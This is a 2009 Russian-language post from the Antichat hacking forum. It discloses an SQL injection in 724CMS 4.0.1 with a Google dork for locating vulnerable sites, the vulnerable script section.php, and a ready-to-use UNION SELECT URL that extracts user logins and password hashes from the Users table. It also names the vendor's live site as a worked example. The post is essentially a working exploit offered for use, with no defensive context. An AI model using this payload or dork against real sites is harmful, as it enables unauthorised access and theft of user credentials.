08.09.2009, 22:31
|
|
Members of Antichat - Level 5
Регистрация: 23.08.2007
Сообщений: 417
Провел на форуме:
14324684
Репутация:
3908
|
|
724CMS 4.0.1 SQL-Inj
Продукт: 724CMS
Версия: 4.0.1
Дорк: inurl:"section.php?Nav=Section"
Уязвимый скрипт: section.php
CMS платная, где слить сорцы не нашел.
Эксплойт:
Код:
http://site.com/section.php?Nav=Section&Lang=En&ID=-1+union+select+1,2,3,4,5,6,7,8,9,concat_ws(0x3a,user_login,user_password),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+from+Users--
Пример на сайте разработчика:
Код:
http://724cms.ca/section.php?Nav=Section&Lang=En&ID=-18+union+select+1,2,3,4,5,6,7,8,9,concat_ws(0x3a,user_login,user_password),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+from+Users--
Вывод в тегах <title></title>
__________________
Feci, quod potui. Faciant meliora potentes.
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Комбинированный вид
